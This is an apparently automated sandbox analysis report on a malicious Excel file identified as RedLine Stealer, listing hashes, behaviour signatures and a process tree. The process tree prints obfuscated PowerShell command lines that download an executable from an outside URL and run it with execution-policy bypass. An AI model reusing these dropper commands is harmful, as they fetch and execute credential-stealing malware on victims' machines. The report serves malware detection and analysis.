Analysis

max time kernel: 146s
max time network: 129s
platform: windows10_x64
resource: win10v20201028
submitted: 10-02-2021 07:49
Behavioral tasks

behavioral1
  Sample: order_list_fe99087.xls
  Resource: win7v20201028

behavioral2
  Sample: order_list_fe99087.xls
  Resource: win10v20201028
General

Target: order_list_fe99087.xls
Size: 221KB
MD5: aeb9b7f6fb7bac0deac61db8295e1d3c
SHA1: 823814c91d8c75933f0f49cda5b07ac14e484390
SHA256: ce07dc9b67f4e91fb0254421599c3344f60732b99c24d39d4f2a5b8e93da56ef
SHA512: cc3c349fdb18bbac96f36cff152c8c4873d10179cc6dab06863ac421ffc9b8d75f67c991522eaea736bc58aef3a7c172811e12f3ae08e4ebe6e32417456e936c
Malware Config

Extracted URL: http://urgfuid.gq/z/z.exe
Signatures
-
Process spawned unexpected child process (3 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes: powershell.exe, powershell.exe, powershell.exe
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 1864 | 1304 | powershell.exe | EXCEL.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2160 | 1304 | powershell.exe | EXCEL.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2624 | 1304 | powershell.exe | EXCEL.EXE
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload (2 IoCs)
Processes:
  resource | yara_rule
  behavioral2/memory/4512-40-0x0000000004110000-0x000000000413C000-memory.dmp | family_redline
  behavioral2/memory/4512-46-0x0000000004380000-0x00000000043AA000-memory.dmp | family_redline
-
Blocklisted process makes network request (1 IoC)
Processes: powershell.exe
  flow | pid | process
  17 | 1864 | powershell.exe
-
Executes dropped EXE (2 IoCs)
Processes: z.exe, o.exe
  pid | process
  4512 | z.exe
  4792 | o.exe
-
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: EXCEL.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
-
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes: EXCEL.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
-
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes: EXCEL.EXE
  pid | process
  1304 | EXCEL.EXE
-
Suspicious behavior: EnumeratesProcesses (31 IoCs)
Processes: powershell.exe, powershell.exe, powershell.exe, z.exe, o.exe
  pid | process | occurrences
  1864 | powershell.exe | 3
  2160 | powershell.exe | 3
  2624 | powershell.exe | 3
  4512 | z.exe | 2
  4792 | o.exe | 20
-
Suspicious use of AdjustPrivilegeToken (5 IoCs)
Processes: powershell.exe, powershell.exe, powershell.exe, z.exe, o.exe
  description | pid | process
  Token: SeDebugPrivilege | 1864 | powershell.exe
  Token: SeDebugPrivilege | 2624 | powershell.exe
  Token: SeDebugPrivilege | 2160 | powershell.exe
  Token: SeDebugPrivilege | 4512 | z.exe
  Token: SeDebugPrivilege | 4792 | o.exe
-
Suspicious use of FindShellTrayWindow (2 IoCs)
Processes: EXCEL.EXE
  pid | process | occurrences
  1304 | EXCEL.EXE | 2
-
Suspicious use of SetWindowsHookEx (15 IoCs)
Processes: EXCEL.EXE, o.exe
  pid | process | occurrences
  1304 | EXCEL.EXE | 14
  4792 | o.exe | 1
-
Suspicious use of WriteProcessMemory (11 IoCs)
Processes: EXCEL.EXE, powershell.exe, z.exe
  description | pid | process | target process | occurrences
  PID 1304 wrote to memory of 1864 | 1304 | EXCEL.EXE | powershell.exe | 2
  PID 1304 wrote to memory of 2160 | 1304 | EXCEL.EXE | powershell.exe | 2
  PID 1304 wrote to memory of 2624 | 1304 | EXCEL.EXE | powershell.exe | 2
  PID 2624 wrote to memory of 4512 | 2624 | powershell.exe | z.exe | 3
  PID 4512 wrote to memory of 4792 | 4512 | z.exe | o.exe | 2
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (PID 1304, depth 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\order_list_fe99087.xls"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
-
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1864, depth 2)
    Command line: powershell -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('http://urgfuid.gq/z/z.exe','z.exe')
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
-
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2160, depth 2)
    Command line: powershell -w 1 Start-Sleep 20; Move-Item "z.exe" -Destination "${enV`:appdata}"
    - Process spawned unexpected child process
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
-
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2624, depth 2)
    Command line: powershell -w 1 -EP bypass Start-Sleep 25; cd ${enV`:appdata};.('.'+'/z.exe')
    - Process spawned unexpected child process
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
-
    C:\Users\Admin\AppData\Roaming\z.exe (PID 4512, depth 3)
      Command line: "C:\Users\Admin\AppData\Roaming\z.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
-
      C:\Users\Admin\AppData\Local\Temp\o.exe (PID 4792, depth 4)
        Command line: "C:\Users\Admin\AppData\Local\Temp\o.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v6
Downloads
-
MD5: d737fc27bbf2f3bd19d1706af83dbe3f
SHA1: 212d219394124968b50769c371121a577d973985
SHA256: b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982
SHA512: 974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b
-
MD5: 4535f96e055bf316b898dd294d34c7dc
SHA1: 285a45622c61bb703e534ea029b49a78b64cd6bc
SHA256: d428372a6678f12b4d2283043af39d08285dfdc90943bef4a5e6f6e7111d2b7b
SHA512: 9740c2028b0a9a454658a83115f1953758fde47e6057718c6f31041174d17e83e11316938d1b21a6f5e7f561708f62a68481c5b8f0f86d88071fb176cd2a5bac
-
MD5: 8af6efbaab75973315f4fa4633a1f900
SHA1: ddaf8d6d0723883e4bbb1510e004ba4f5c6371c0
SHA256: f65bfb7acb6780c4d85e3220bb104f91b50fd722c213fd8f765ee81a3700212d
SHA512: 52049b8a4881f64b0451d1351cd5709f6c3823260f493151e24e1704362fe5861ee7dc5afb1e3bcfd5dcda3493cf39e94e819e4e7291e9c0e6b6cf9a7f862f19
-
MD5: f254515cdf3cf10e1555046493c5bee8
SHA1: 4eee393ad747349fda88bf5690dbb60aa450eced
SHA256: 24be4bd66f7e47dee0a64925c1ceee243396c06d18c00fb16ce54204cb9b096e
SHA512: c6e06be4c7b9150e99d1708b6b45153de4d850490274ea6672177bcbbdde676aed3a2a038dd14936b54b68bcc46f7fdc382db82a26b5776e9ca81d6dc14362b1
-
Path: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5: 44dbfb1a22a74b96675ad8e22dc43fde
SHA1: d649e0d57674999eef40fdb41a8c6b9e8f728695
SHA256: b99546ba0e4d0ee8842ff3cbce5c392b160cde9167917846dfa00d3a3107b33e
SHA512: 61664123b2503bd681a1318c38cc144cffecea60d5ead6950eafa845e00ea3d4537bfc1857b9b100fd1cf2b66996b2847d11ddd9b4ee8491a80f6349d3a3e874
-
Path: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5: 938af8bfbd5bb9caec62a56722d34fe7
SHA1: 2d49fcf914a8148f0e3b1327cfac72ee6a7e0fa3
SHA256: f6eb69350a275e782aa7a688d624e734824c1226ad58902c71ad86f958d0255d
SHA512: bf36a8a2599cb61f5a9e93106e2fe7a08733e36d6737bacce798d7755bac7a72bdcf200bbfd75677939c412736c8708d9a9df157f498663a793cc8a7a7891abc
-
MD5: feb57ff3d961685dc7a12fcb2ef8ba63
SHA1: 9fbceb22b3468083f3aa583e4183f4c9e407bcd9
SHA256: 97059b74b76a880fae49ca4bfa64953cb694e60195a387018440066e5c0cf853
SHA512: 8d61eac914c1cfc296e898772505a3646ede92e20855da5e5d0271fc856143a486f3efde7172ae09b46a4cbdfd37d547afddb86f3e5946a460372986fa0759a8